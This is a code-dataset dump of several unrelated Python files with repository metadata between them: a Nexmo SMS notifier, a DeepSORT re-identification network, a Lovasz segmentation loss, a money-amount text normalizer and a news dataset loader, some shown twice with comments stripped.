self.ttl = int(ttl)
except (ValueError, TypeError):
pass
if self.ttl < self.template_args['ttl']['min'] or \
self.ttl > self.template_args['ttl']['max']:
msg = 'The Nexmo TTL specified ({}) is out of range.'\
.format(self.ttl)
self.logger.warning(msg)
raise TypeError(msg)
self.source = source
result = is_phone_no(source)
if not result:
msg = 'The Account (From) Phone # specified ' \
'({}) is invalid.'.format(source)
self.logger.warning(msg)
raise TypeError(msg)
self.source = result['full']
self.targets = list()
for target in parse_phone_no(targets):
result = is_phone_no(target)
if not result:
self.logger.warning(
'Dropped invalid phone # '
'({}) specified.'.format(target),
)
continue
self.targets.append(result['full'])
return
def send(self, body, title='', notify_type=NotifyType.INFO, **kwargs):
has_error = False
headers = {
'User-Agent': self.app_id,
'Content-Type': 'application/x-www-form-urlencoded',
}
payload = {
'api_key': self.apikey,
'api_secret': self.secret,
'ttl': self.ttl,
'from': self.source,
'text': body,
'to': None,
}
targets = list(self.targets)
if len(targets) == 0:
targets.append(self.source)
while len(targets):
target = targets.pop(0)
payload['to'] = target
self.logger.debug('Nexmo POST URL: {} (cert_verify={})'.format(
self.notify_url, self.verify_certificate))
self.logger.debug('Nexmo Payload: {}' .format(payload))
self.throttle()
try:
r = requests.post(
self.notify_url,
data=payload,
headers=headers,
verify=self.verify_certificate,
timeout=self.request_timeout,
)
if r.status_code != requests.codes.ok:
status_str = \
NotifyNexmo.http_response_code_lookup(
r.status_code)
self.logger.warning(
'Failed to send Nexmo notification to {}: '
'{}{}error={}.'.format(
target,
status_str,
', ' if status_str else '',
r.status_code))
self.logger.debug(
'Response Details:\r\n{}'.format(r.content))
has_error = True
continue
else:
self.logger.info('Sent Nexmo notification to %s.' % target)
except requests.RequestException as e:
self.logger.warning(
'A Connection error occurred sending Nexmo:%s '
'notification.' % target
)
self.logger.debug('Socket Exception: %s' % str(e))
has_error = True
continue
return not has_error
def url(self, privacy=False, *args, **kwargs):
params = {
'ttl': str(self.ttl),
}
params.update(self.url_parameters(privacy=privacy, *args, **kwargs))
return '{schema}://{key}:{secret}@{source}/{targets}/?{params}'.format(
schema=self.secure_protocol,
key=self.pprint(self.apikey, privacy, safe=''),
secret=self.pprint(
self.secret, privacy, mode=PrivacyMode.Secret, safe=''),
source=NotifyNexmo.quote(self.source, safe=''),
targets='/'.join(
[NotifyNexmo.quote(x, safe='') for x in self.targets]),
params=NotifyNexmo.urlencode(params))
@staticmethod
def parse_url(url):
results = NotifyBase.parse_url(url, verify_host=False)
if not results:
return results
results['targets'] = NotifyNexmo.split_path(results['fullpath'])
results['source'] = NotifyNexmo.unquote(results['host'])
results['apikey'] = NotifyNexmo.unquote(results['user'])
results['secret'] = NotifyNexmo.unquote(results['password'])
if 'key' in results['qsd'] and len(results['qsd']['key']):
results['apikey'] = \
NotifyNexmo.unquote(results['qsd']['key'])
if 'secret' in results['qsd'] and len(results['qsd']['secret']):
results['secret'] = \
NotifyNexmo.unquote(results['qsd']['secret'])
if 'from' in results['qsd'] and len(results['qsd']['from']):
results['source'] = \
NotifyNexmo.unquote(results['qsd']['from'])
if 'source' in results['qsd'] and len(results['qsd']['source']):
results['source'] = \
NotifyNexmo.unquote(results['qsd']['source'])
if 'ttl' in results['qsd'] and len(results['qsd']['ttl']):
results['ttl'] = \
NotifyNexmo.unquote(results['qsd']['ttl'])
if 'to' in results['qsd'] and len(results['qsd']['to']):
results['targets'] += \
NotifyNexmo.parse_phone_no(results['qsd']['to'])
return results
| true
| true
|
1c423ab64dfbb1ededc7018e40988e7380610cec
| 3,421
|
py
|
Python
|
EfficientGCNv1/utils/tracking/deepsort/deep/model.py
|
myatthukyaw/res_efficient_gcns
|
89280d10f1d4864dfa0a5c3813db11e074dcb2f2
|
[
"MIT"
] | null | null | null |
EfficientGCNv1/utils/tracking/deepsort/deep/model.py
|
myatthukyaw/res_efficient_gcns
|
89280d10f1d4864dfa0a5c3813db11e074dcb2f2
|
[
"MIT"
] | null | null | null |
EfficientGCNv1/utils/tracking/deepsort/deep/model.py
|
myatthukyaw/res_efficient_gcns
|
89280d10f1d4864dfa0a5c3813db11e074dcb2f2
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.functional as F
class BasicBlock(nn.Module):
def __init__(self, c_in, c_out, is_downsample=False):
super(BasicBlock, self).__init__()
self.is_downsample = is_downsample
if is_downsample:
self.conv1 = nn.Conv2d(
c_in, c_out, 3, stride=2, padding=1, bias=False)
else:
self.conv1 = nn.Conv2d(
c_in, c_out, 3, stride=1, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(c_out)
self.relu = nn.ReLU(True)
self.conv2 = nn.Conv2d(c_out, c_out, 3, stride=1,
padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(c_out)
if is_downsample:
self.downsample = nn.Sequential(
nn.Conv2d(c_in, c_out, 1, stride=2, bias=False),
nn.BatchNorm2d(c_out)
)
elif c_in != c_out:
self.downsample = nn.Sequential(
nn.Conv2d(c_in, c_out, 1, stride=1, bias=False),
nn.BatchNorm2d(c_out)
)
self.is_downsample = True
def forward(self, x):
y = self.conv1(x)
y = self.bn1(y)
y = self.relu(y)
y = self.conv2(y)
y = self.bn2(y)
if self.is_downsample:
x = self.downsample(x)
return F.relu(x.add(y), True)
def make_layers(c_in, c_out, repeat_times, is_downsample=False):
blocks = []
for i in range(repeat_times):
if i == 0:
blocks += [BasicBlock(c_in, c_out, is_downsample=is_downsample)]
else:
blocks += [BasicBlock(c_out, c_out)]
return nn.Sequential(*blocks)
class Net(nn.Module):
def __init__(self, num_classes=751, reid=False):
super(Net, self).__init__()
# 3 128 64
self.conv = nn.Sequential(
nn.Conv2d(3, 64, 3, stride=1, padding=1),
nn.BatchNorm2d(64),
nn.ReLU(inplace=True),
# nn.Conv2d(32,32,3,stride=1,padding=1),
# nn.BatchNorm2d(32),
# nn.ReLU(inplace=True),
nn.MaxPool2d(3, 2, padding=1),
)
# 32 64 32
self.layer1 = make_layers(64, 64, 2, False)
# 32 64 32
self.layer2 = make_layers(64, 128, 2, True)
# 64 32 16
self.layer3 = make_layers(128, 256, 2, True)
# 128 16 8
self.layer4 = make_layers(256, 512, 2, True)
# 256 8 4
self.avgpool = nn.AvgPool2d((8, 4), 1)
# 256 1 1
self.reid = reid
self.classifier = nn.Sequential(
nn.Linear(512, 256),
nn.BatchNorm1d(256),
nn.ReLU(inplace=True),
nn.Dropout(),
nn.Linear(256, num_classes),
)
def forward(self, x):
x = self.conv(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
# B x 128
if self.reid:
x = x.div(x.norm(p=2, dim=1, keepdim=True))
return x
# classifier
x = self.classifier(x)
return x
if __name__ == '__main__':
net = Net()
x = torch.randn(4, 3, 128, 64)
y = net(x)
import ipdb
ipdb.set_trace()
| 31.1
| 77
| 0.504239
|
import torch
import torch.nn as nn
import torch.nn.functional as F
class BasicBlock(nn.Module):
def __init__(self, c_in, c_out, is_downsample=False):
super(BasicBlock, self).__init__()
self.is_downsample = is_downsample
if is_downsample:
self.conv1 = nn.Conv2d(
c_in, c_out, 3, stride=2, padding=1, bias=False)
else:
self.conv1 = nn.Conv2d(
c_in, c_out, 3, stride=1, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(c_out)
self.relu = nn.ReLU(True)
self.conv2 = nn.Conv2d(c_out, c_out, 3, stride=1,
padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(c_out)
if is_downsample:
self.downsample = nn.Sequential(
nn.Conv2d(c_in, c_out, 1, stride=2, bias=False),
nn.BatchNorm2d(c_out)
)
elif c_in != c_out:
self.downsample = nn.Sequential(
nn.Conv2d(c_in, c_out, 1, stride=1, bias=False),
nn.BatchNorm2d(c_out)
)
self.is_downsample = True
def forward(self, x):
y = self.conv1(x)
y = self.bn1(y)
y = self.relu(y)
y = self.conv2(y)
y = self.bn2(y)
if self.is_downsample:
x = self.downsample(x)
return F.relu(x.add(y), True)
def make_layers(c_in, c_out, repeat_times, is_downsample=False):
blocks = []
for i in range(repeat_times):
if i == 0:
blocks += [BasicBlock(c_in, c_out, is_downsample=is_downsample)]
else:
blocks += [BasicBlock(c_out, c_out)]
return nn.Sequential(*blocks)
class Net(nn.Module):
def __init__(self, num_classes=751, reid=False):
super(Net, self).__init__()
self.conv = nn.Sequential(
nn.Conv2d(3, 64, 3, stride=1, padding=1),
nn.BatchNorm2d(64),
nn.ReLU(inplace=True),
nn.MaxPool2d(3, 2, padding=1),
)
self.layer1 = make_layers(64, 64, 2, False)
self.layer2 = make_layers(64, 128, 2, True)
self.layer3 = make_layers(128, 256, 2, True)
self.layer4 = make_layers(256, 512, 2, True)
self.avgpool = nn.AvgPool2d((8, 4), 1)
self.reid = reid
self.classifier = nn.Sequential(
nn.Linear(512, 256),
nn.BatchNorm1d(256),
nn.ReLU(inplace=True),
nn.Dropout(),
nn.Linear(256, num_classes),
)
def forward(self, x):
x = self.conv(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
if self.reid:
x = x.div(x.norm(p=2, dim=1, keepdim=True))
return x
x = self.classifier(x)
return x
if __name__ == '__main__':
net = Net()
x = torch.randn(4, 3, 128, 64)
y = net(x)
import ipdb
ipdb.set_trace()
| true
| true
|
1c423b8b7b57531cefb41a87ab4a95bea00517a7
| 7,780
|
py
|
Python
|
src/losses/lovasz.py
|
vpeopleonatank/segmentation
|
6c93e14f465117ca1818e7d9cdd95ffc37e15f45
|
[
"MIT"
] | null | null | null |
src/losses/lovasz.py
|
vpeopleonatank/segmentation
|
6c93e14f465117ca1818e7d9cdd95ffc37e15f45
|
[
"MIT"
] | null | null | null |
src/losses/lovasz.py
|
vpeopleonatank/segmentation
|
6c93e14f465117ca1818e7d9cdd95ffc37e15f45
|
[
"MIT"
] | null | null | null |
# type: ignore
"""
Lovasz-Softmax and Jaccard hinge loss in PyTorch
Maxim Berman 2018 ESAT-PSI KU Leuven (MIT License)
"""
from __future__ import print_function, division
from typing import Optional
import torch
import torch.nn.functional as F
from torch.autograd import Variable
from torch.nn.modules.loss import _Loss
from .constants import BINARY_MODE, MULTICLASS_MODE, MULTILABEL_MODE
try:
from itertools import ifilterfalse
except ImportError: # py3k
from itertools import filterfalse as ifilterfalse
__all__ = ["LovaszLoss"]
def _lovasz_grad(gt_sorted):
"""Compute gradient of the Lovasz extension w.r.t sorted errors
See Alg. 1 in paper
"""
p = len(gt_sorted)
gts = gt_sorted.sum()
intersection = gts - gt_sorted.float().cumsum(0)
union = gts + (1 - gt_sorted).float().cumsum(0)
jaccard = 1.0 - intersection / union
if p > 1: # cover 1-pixel case
jaccard[1:p] = jaccard[1:p] - jaccard[0:-1]
return jaccard
def _lovasz_hinge(logits, labels, per_image=True, ignore=None):
"""
Binary Lovasz hinge loss
logits: [B, H, W] Variable, logits at each pixel (between -infinity and +infinity)
labels: [B, H, W] Tensor, binary ground truth masks (0 or 1)
per_image: compute the loss per image instead of per batch
ignore: void class id
"""
if per_image:
loss = mean(
_lovasz_hinge_flat(*_flatten_binary_scores(log.unsqueeze(0), lab.unsqueeze(0), ignore))
for log, lab in zip(logits, labels)
)
else:
loss = _lovasz_hinge_flat(*_flatten_binary_scores(logits, labels, ignore))
return loss
def _lovasz_hinge_flat(logits, labels):
"""Binary Lovasz hinge loss
Args:
logits: [P] Variable, logits at each prediction (between -infinity and +infinity)
labels: [P] Tensor, binary ground truth labels (0 or 1)
ignore: label to ignore
"""
if len(labels) == 0:
# only void pixels, the gradients should be 0
return logits.sum() * 0.0
signs = 2.0 * labels.float() - 1.0
errors = 1.0 - logits * Variable(signs)
errors_sorted, perm = torch.sort(errors, dim=0, descending=True)
perm = perm.data
gt_sorted = labels[perm]
grad = _lovasz_grad(gt_sorted)
loss = torch.dot(F.relu(errors_sorted), Variable(grad))
return loss
def _flatten_binary_scores(scores, labels, ignore=None):
"""Flattens predictions in the batch (binary case)
Remove labels equal to 'ignore'
"""
scores = scores.view(-1)
labels = labels.view(-1)
if ignore is None:
return scores, labels
valid = labels != ignore
vscores = scores[valid]
vlabels = labels[valid]
return vscores, vlabels
# --------------------------- MULTICLASS LOSSES ---------------------------
def _lovasz_softmax(probas, labels, classes="present", per_image=False, ignore=None):
"""Multi-class Lovasz-Softmax loss
Args:
@param probas: [B, C, H, W] Variable, class probabilities at each prediction (between 0 and 1).
Interpreted as binary (sigmoid) output with outputs of size [B, H, W].
@param labels: [B, H, W] Tensor, ground truth labels (between 0 and C - 1)
@param classes: 'all' for all, 'present' for classes present in labels, or a list of classes to average.
@param per_image: compute the loss per image instead of per batch
@param ignore: void class labels
"""
if per_image:
loss = mean(
_lovasz_softmax_flat(*_flatten_probas(prob.unsqueeze(0), lab.unsqueeze(0), ignore), classes=classes)
for prob, lab in zip(probas, labels)
)
else:
loss = _lovasz_softmax_flat(*_flatten_probas(probas, labels, ignore), classes=classes)
return loss
def _lovasz_softmax_flat(probas, labels, classes="present"):
"""Multi-class Lovasz-Softmax loss
Args:
@param probas: [P, C] Variable, class probabilities at each prediction (between 0 and 1)
@param labels: [P] Tensor, ground truth labels (between 0 and C - 1)
@param classes: 'all' for all, 'present' for classes present in labels, or a list of classes to average.
"""
if probas.numel() == 0:
# only void pixels, the gradients should be 0
return probas * 0.0
C = probas.size(1)
losses = []
class_to_sum = list(range(C)) if classes in ["all", "present"] else classes
for c in class_to_sum:
fg = (labels == c).type_as(probas) # foreground for class c
if classes == "present" and fg.sum() == 0:
continue
if C == 1:
if len(classes) > 1:
raise ValueError("Sigmoid output possible only with 1 class")
class_pred = probas[:, 0]
else:
class_pred = probas[:, c]
errors = (fg - class_pred).abs()
errors_sorted, perm = torch.sort(errors, 0, descending=True)
perm = perm.data
fg_sorted = fg[perm]
losses.append(torch.dot(errors_sorted, _lovasz_grad(fg_sorted)))
return mean(losses)
def _flatten_probas(probas, labels, ignore=None):
"""Flattens predictions in the batch"""
if probas.dim() == 3:
# assumes output of a sigmoid layer
B, H, W = probas.size()
probas = probas.view(B, 1, H, W)
C = probas.size(1)
    probas = torch.movedim(probas, 1, -1)  # [B, C, Di, Dj, Dk...] -> [B, Di...Dk, C]
probas = probas.contiguous().view(-1, C) # [P, C]
labels = labels.view(-1)
if ignore is None:
return probas, labels
valid = labels != ignore
vprobas = probas[valid]
vlabels = labels[valid]
return vprobas, vlabels
# --------------------------- HELPER FUNCTIONS ---------------------------
def isnan(x):
return x != x
def mean(values, ignore_nan=False, empty=0):
"""Nanmean compatible with generators."""
values = iter(values)
if ignore_nan:
values = ifilterfalse(isnan, values)
try:
n = 1
acc = next(values)
except StopIteration:
if empty == "raise":
raise ValueError("Empty mean")
return empty
for n, v in enumerate(values, 2):
acc += v
if n == 1:
return acc
return acc / n
class LovaszLoss(_Loss):
def __init__(
self,
mode: str,
per_image: bool = False,
ignore_index: Optional[int] = None,
from_logits: bool = True,
):
"""Implementation of Lovasz loss for image segmentation task.
It supports binary, multiclass and multilabel cases
Args:
mode: Loss mode 'binary', 'multiclass' or 'multilabel'
ignore_index: Label that indicates ignored pixels (does not contribute to loss)
per_image: If True loss computed per each image and then averaged, else computed per whole batch
Shape
- **y_pred** - torch.Tensor of shape (N, C, H, W)
- **y_true** - torch.Tensor of shape (N, H, W) or (N, C, H, W)
Reference
https://github.com/BloodAxe/pytorch-toolbelt
"""
assert mode in {BINARY_MODE, MULTILABEL_MODE, MULTICLASS_MODE}
super().__init__()
self.mode = mode
self.ignore_index = ignore_index
self.per_image = per_image
def forward(self, y_pred, y_true):
if self.mode in {BINARY_MODE, MULTILABEL_MODE}:
loss = _lovasz_hinge(y_pred, y_true, per_image=self.per_image, ignore=self.ignore_index)
elif self.mode == MULTICLASS_MODE:
y_pred = y_pred.softmax(dim=1)
loss = _lovasz_softmax(y_pred, y_true, per_image=self.per_image, ignore=self.ignore_index)
else:
raise ValueError("Wrong mode {}.".format(self.mode))
return loss
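# --------------------------- USAGE SKETCH ---------------------------
# Illustrative sketch, not part of the original module: a quick smoke test of the
# LovaszLoss wrapper and the binary hinge helper defined above. Tensor shapes follow the
# docstrings; the random inputs and the chosen sizes are assumptions for illustration only.
if __name__ == "__main__":
    torch.manual_seed(0)

    # multiclass: raw logits [B, C, H, W] and integer masks [B, H, W]
    logits = torch.randn(2, 3, 8, 8)
    target = torch.randint(0, 3, (2, 8, 8))
    loss_fn = LovaszLoss(mode=MULTICLASS_MODE, per_image=False)
    print("multiclass lovasz:", loss_fn(logits, target).item())

    # binary: per-pixel logits [B, H, W] and {0, 1} masks of the same shape
    bin_logits = torch.randn(2, 8, 8)
    bin_target = (torch.rand(2, 8, 8) > 0.5).long()
    print("binary lovasz hinge:", _lovasz_hinge(bin_logits, bin_target, per_image=True).item())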
| 34.122807
| 112
| 0.621465
|
from __future__ import print_function, division
from typing import Optional
import torch
import torch.nn.functional as F
from torch.autograd import Variable
from torch.nn.modules.loss import _Loss
from .constants import BINARY_MODE, MULTICLASS_MODE, MULTILABEL_MODE
try:
from itertools import ifilterfalse
except ImportError:
from itertools import filterfalse as ifilterfalse
__all__ = ["LovaszLoss"]
def _lovasz_grad(gt_sorted):
p = len(gt_sorted)
gts = gt_sorted.sum()
intersection = gts - gt_sorted.float().cumsum(0)
union = gts + (1 - gt_sorted).float().cumsum(0)
jaccard = 1.0 - intersection / union
if p > 1:
jaccard[1:p] = jaccard[1:p] - jaccard[0:-1]
return jaccard
def _lovasz_hinge(logits, labels, per_image=True, ignore=None):
if per_image:
loss = mean(
_lovasz_hinge_flat(*_flatten_binary_scores(log.unsqueeze(0), lab.unsqueeze(0), ignore))
for log, lab in zip(logits, labels)
)
else:
loss = _lovasz_hinge_flat(*_flatten_binary_scores(logits, labels, ignore))
return loss
def _lovasz_hinge_flat(logits, labels):
if len(labels) == 0:
return logits.sum() * 0.0
signs = 2.0 * labels.float() - 1.0
errors = 1.0 - logits * Variable(signs)
errors_sorted, perm = torch.sort(errors, dim=0, descending=True)
perm = perm.data
gt_sorted = labels[perm]
grad = _lovasz_grad(gt_sorted)
loss = torch.dot(F.relu(errors_sorted), Variable(grad))
return loss
def _flatten_binary_scores(scores, labels, ignore=None):
scores = scores.view(-1)
labels = labels.view(-1)
if ignore is None:
return scores, labels
valid = labels != ignore
vscores = scores[valid]
vlabels = labels[valid]
return vscores, vlabels
def _lovasz_softmax(probas, labels, classes="present", per_image=False, ignore=None):
if per_image:
loss = mean(
_lovasz_softmax_flat(*_flatten_probas(prob.unsqueeze(0), lab.unsqueeze(0), ignore), classes=classes)
for prob, lab in zip(probas, labels)
)
else:
loss = _lovasz_softmax_flat(*_flatten_probas(probas, labels, ignore), classes=classes)
return loss
def _lovasz_softmax_flat(probas, labels, classes="present"):
if probas.numel() == 0:
return probas * 0.0
C = probas.size(1)
losses = []
class_to_sum = list(range(C)) if classes in ["all", "present"] else classes
for c in class_to_sum:
fg = (labels == c).type_as(probas)
if classes == "present" and fg.sum() == 0:
continue
if C == 1:
if len(classes) > 1:
raise ValueError("Sigmoid output possible only with 1 class")
class_pred = probas[:, 0]
else:
class_pred = probas[:, c]
errors = (fg - class_pred).abs()
errors_sorted, perm = torch.sort(errors, 0, descending=True)
perm = perm.data
fg_sorted = fg[perm]
losses.append(torch.dot(errors_sorted, _lovasz_grad(fg_sorted)))
return mean(losses)
def _flatten_probas(probas, labels, ignore=None):
if probas.dim() == 3:
B, H, W = probas.size()
probas = probas.view(B, 1, H, W)
C = probas.size(1)
    probas = torch.movedim(probas, 1, -1)
probas = probas.contiguous().view(-1, C)
labels = labels.view(-1)
if ignore is None:
return probas, labels
valid = labels != ignore
vprobas = probas[valid]
vlabels = labels[valid]
return vprobas, vlabels
def isnan(x):
return x != x
def mean(values, ignore_nan=False, empty=0):
values = iter(values)
if ignore_nan:
values = ifilterfalse(isnan, values)
try:
n = 1
acc = next(values)
except StopIteration:
if empty == "raise":
raise ValueError("Empty mean")
return empty
for n, v in enumerate(values, 2):
acc += v
if n == 1:
return acc
return acc / n
class LovaszLoss(_Loss):
def __init__(
self,
mode: str,
per_image: bool = False,
ignore_index: Optional[int] = None,
from_logits: bool = True,
):
assert mode in {BINARY_MODE, MULTILABEL_MODE, MULTICLASS_MODE}
super().__init__()
self.mode = mode
self.ignore_index = ignore_index
self.per_image = per_image
def forward(self, y_pred, y_true):
if self.mode in {BINARY_MODE, MULTILABEL_MODE}:
loss = _lovasz_hinge(y_pred, y_true, per_image=self.per_image, ignore=self.ignore_index)
elif self.mode == MULTICLASS_MODE:
y_pred = y_pred.softmax(dim=1)
loss = _lovasz_softmax(y_pred, y_true, per_image=self.per_image, ignore=self.ignore_index)
else:
raise ValueError("Wrong mode {}.".format(self.mode))
return loss
| true
| true
|
1c423d1db13036f9e4d5254adda577280f573f86
| 90
|
py
|
Python
|
algorithms/algorithm.py
|
songheony/oplp
|
7947fec7c0cf84d327c5bb3406e5dfd465e82a10
|
[
"MIT"
] | null | null | null |
algorithms/algorithm.py
|
songheony/oplp
|
7947fec7c0cf84d327c5bb3406e5dfd465e82a10
|
[
"MIT"
] | null | null | null |
algorithms/algorithm.py
|
songheony/oplp
|
7947fec7c0cf84d327c5bb3406e5dfd465e82a10
|
[
"MIT"
] | null | null | null |
class Algorithm:
def update(self, *args, **kwargs):
raise NotImplementedError
| 22.5
| 38
| 0.677778
|
class Algorithm:
def update(self, *args, **kwargs):
raise NotImplementedError
| true
| true
|
1c423d68a9156819e5928c17fa91da75b8ce1ef1
| 4,341
|
py
|
Python
|
src/inverse_text_normalization/ori/taggers/money.py
|
yashiagar1999/indict_punc
|
8697ac5a5245c7e0d35b0777b1dc6fb1b8d6d525
|
[
"MIT"
] | 15
|
2021-07-30T18:18:47.000Z
|
2022-02-14T09:04:19.000Z
|
src/inverse_text_normalization/ori/taggers/money.py
|
yashiagar1999/indict_punc
|
8697ac5a5245c7e0d35b0777b1dc6fb1b8d6d525
|
[
"MIT"
] | 1
|
2021-12-15T12:42:12.000Z
|
2022-02-15T05:33:00.000Z
|
src/inverse_text_normalization/ori/taggers/money.py
|
yashiagar1999/indict_punc
|
8697ac5a5245c7e0d35b0777b1dc6fb1b8d6d525
|
[
"MIT"
] | 4
|
2021-07-30T10:03:38.000Z
|
2021-12-01T14:46:54.000Z
|
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from inverse_text_normalization.ori.data_loader_utils import get_abs_path
from inverse_text_normalization.ori.graph_utils import (
NEMO_DIGIT,
NEMO_SIGMA,
GraphFst,
convert_space,
delete_extra_space,
delete_space,
get_singulars,
insert_space,
)
try:
import pynini
from pynini.lib import pynutil
PYNINI_AVAILABLE = True
except (ModuleNotFoundError, ImportError):
PYNINI_AVAILABLE = False
# from inverse_text_normalization.lang_params import LANG
# lang_data_path = f'inverse_text_normalization/data/{LANG}_data/'
lang_data_path = 'data/'
class MoneyFst(GraphFst):
"""
Finite state transducer for classifying money
e.g. twelve dollars and five cents -> money { integer_part: "12" fractional_part: 05 currency: "$" }
Args:
cardinal: Cardinal GraphFST
decimal: Decimal GraphFST
"""
def __init__(self, cardinal: GraphFst, decimal: GraphFst):
super().__init__(name="money", kind="classify")
# quantity, integer_part, fractional_part, currency, style(depr)
cardinal_graph = cardinal.graph_no_exception
graph_decimal_final = decimal.final_graph_wo_negative
unit = pynini.string_file(get_abs_path(lang_data_path+"currency.tsv"))
unit_singular = pynini.invert(unit)
unit_plural = get_singulars(unit_singular)
graph_unit_singular = pynutil.insert("currency: \"") + convert_space(unit_singular) + pynutil.insert("\"")
graph_unit_plural = pynutil.insert("currency: \"") + convert_space(unit_plural) + pynutil.insert("\"")
add_leading_zero_to_double_digit = (NEMO_DIGIT + NEMO_DIGIT) | (pynutil.insert("0") + NEMO_DIGIT)
# twelve dollars (and) fifty cents, zero cents
cents_standalone = (
pynutil.insert("fractional_part: \"")
+ pynini.union(
pynutil.add_weight(((NEMO_SIGMA - "one") @ cardinal_graph), -0.7) @ add_leading_zero_to_double_digit
+ delete_space
+ pynutil.delete("cents"),
pynini.cross("one", "01") + delete_space + pynutil.delete("cent"),
)
+ pynutil.insert("\"")
)
optional_cents_standalone = pynini.closure(
delete_space
+ pynini.closure(pynutil.delete("and") + delete_space, 0, 1)
+ insert_space
+ cents_standalone,
0,
1,
)
# twelve dollars fifty, only after integer
optional_cents_suffix = pynini.closure(
delete_extra_space
+ pynutil.insert("fractional_part: \"")
+ pynutil.add_weight(cardinal_graph @ add_leading_zero_to_double_digit, -0.7)
+ pynutil.insert("\""),
0,
1,
)
graph_integer = (
pynutil.insert("integer_part: \"")
+ ((NEMO_SIGMA - "one") @ cardinal_graph)
+ pynutil.insert("\"")
+ delete_extra_space
+ (graph_unit_plural | graph_unit_singular)
+ (optional_cents_standalone | optional_cents_suffix)
)
graph_integer |= (
pynutil.insert("integer_part: \"")
+ pynini.cross("one", "1")
+ pynutil.insert("\"")
+ delete_extra_space
+ graph_unit_singular
+ (optional_cents_standalone | optional_cents_suffix)
)
graph_decimal = graph_decimal_final + delete_extra_space + graph_unit_plural
graph_decimal |= pynutil.insert("currency: \"$\" integer_part: \"0\" ") + cents_standalone
final_graph = graph_integer | graph_decimal
final_graph = self.add_tokens(final_graph)
self.fst = final_graph.optimize()
| 37.747826
| 116
| 0.646164
|
from inverse_text_normalization.ori.data_loader_utils import get_abs_path
from inverse_text_normalization.ori.graph_utils import (
NEMO_DIGIT,
NEMO_SIGMA,
GraphFst,
convert_space,
delete_extra_space,
delete_space,
get_singulars,
insert_space,
)
try:
import pynini
from pynini.lib import pynutil
PYNINI_AVAILABLE = True
except (ModuleNotFoundError, ImportError):
PYNINI_AVAILABLE = False
lang_data_path = 'data/'
class MoneyFst(GraphFst):
def __init__(self, cardinal: GraphFst, decimal: GraphFst):
super().__init__(name="money", kind="classify")
cardinal_graph = cardinal.graph_no_exception
graph_decimal_final = decimal.final_graph_wo_negative
unit = pynini.string_file(get_abs_path(lang_data_path+"currency.tsv"))
unit_singular = pynini.invert(unit)
unit_plural = get_singulars(unit_singular)
graph_unit_singular = pynutil.insert("currency: \"") + convert_space(unit_singular) + pynutil.insert("\"")
graph_unit_plural = pynutil.insert("currency: \"") + convert_space(unit_plural) + pynutil.insert("\"")
add_leading_zero_to_double_digit = (NEMO_DIGIT + NEMO_DIGIT) | (pynutil.insert("0") + NEMO_DIGIT)
cents_standalone = (
pynutil.insert("fractional_part: \"")
+ pynini.union(
pynutil.add_weight(((NEMO_SIGMA - "one") @ cardinal_graph), -0.7) @ add_leading_zero_to_double_digit
+ delete_space
+ pynutil.delete("cents"),
pynini.cross("one", "01") + delete_space + pynutil.delete("cent"),
)
+ pynutil.insert("\"")
)
optional_cents_standalone = pynini.closure(
delete_space
+ pynini.closure(pynutil.delete("and") + delete_space, 0, 1)
+ insert_space
+ cents_standalone,
0,
1,
)
optional_cents_suffix = pynini.closure(
delete_extra_space
+ pynutil.insert("fractional_part: \"")
+ pynutil.add_weight(cardinal_graph @ add_leading_zero_to_double_digit, -0.7)
+ pynutil.insert("\""),
0,
1,
)
graph_integer = (
pynutil.insert("integer_part: \"")
+ ((NEMO_SIGMA - "one") @ cardinal_graph)
+ pynutil.insert("\"")
+ delete_extra_space
+ (graph_unit_plural | graph_unit_singular)
+ (optional_cents_standalone | optional_cents_suffix)
)
graph_integer |= (
pynutil.insert("integer_part: \"")
+ pynini.cross("one", "1")
+ pynutil.insert("\"")
+ delete_extra_space
+ graph_unit_singular
+ (optional_cents_standalone | optional_cents_suffix)
)
graph_decimal = graph_decimal_final + delete_extra_space + graph_unit_plural
graph_decimal |= pynutil.insert("currency: \"$\" integer_part: \"0\" ") + cents_standalone
final_graph = graph_integer | graph_decimal
final_graph = self.add_tokens(final_graph)
self.fst = final_graph.optimize()
| true
| true
|
1c423fb9b382926c97effb864db3316e9698d827
| 2,137
|
py
|
Python
|
data/local_news_data/baltimore_sun/loader.py
|
tpsatish95/covid19-search-engine
|
e09ae172216e204f5efc284ead99d17b4461e159
|
[
"Apache-2.0"
] | 1
|
2020-06-14T16:52:55.000Z
|
2020-06-14T16:52:55.000Z
|
data/local_news_data/baltimore_sun/loader.py
|
tpsatish95/covid19-search-engine
|
e09ae172216e204f5efc284ead99d17b4461e159
|
[
"Apache-2.0"
] | 1
|
2020-05-06T14:28:10.000Z
|
2020-05-06T14:28:10.000Z
|
data/local_news_data/baltimore_sun/loader.py
|
tpsatish95/covid19-search-engine
|
e09ae172216e204f5efc284ead99d17b4461e159
|
[
"Apache-2.0"
] | null | null | null |
import os
import re
from collections import defaultdict
from nltk.tokenize import word_tokenize
from data.template import Dataset, Document, Text
class BaltimoreSunCovidDataset(Dataset):
def __init__(self, base_path):
self.base_path = base_path
self.documents = None
super().__init__()
def read_raw(self, filename):
docs = [defaultdict(list)] # empty 0 index
category = ''
with open(os.path.join(self.base_path, filename)) as f:
i = 0
for line in f:
line = line.strip()
if line.startswith('.I'):
i = int(line[3:])
docs.append(defaultdict(list))
elif re.match(r'\.\w', line):
category = line[1]
elif line != '':
docs[i][category].append(Text(line, [word.lower()
for word in word_tokenize(line)]))
return docs
def load_docs(self, filename):
raw_docs = self.read_raw(filename)
documents = list()
for doc_id, _ in enumerate(raw_docs[1:]):
title, content = None, None
raw, tokenized = "", list()
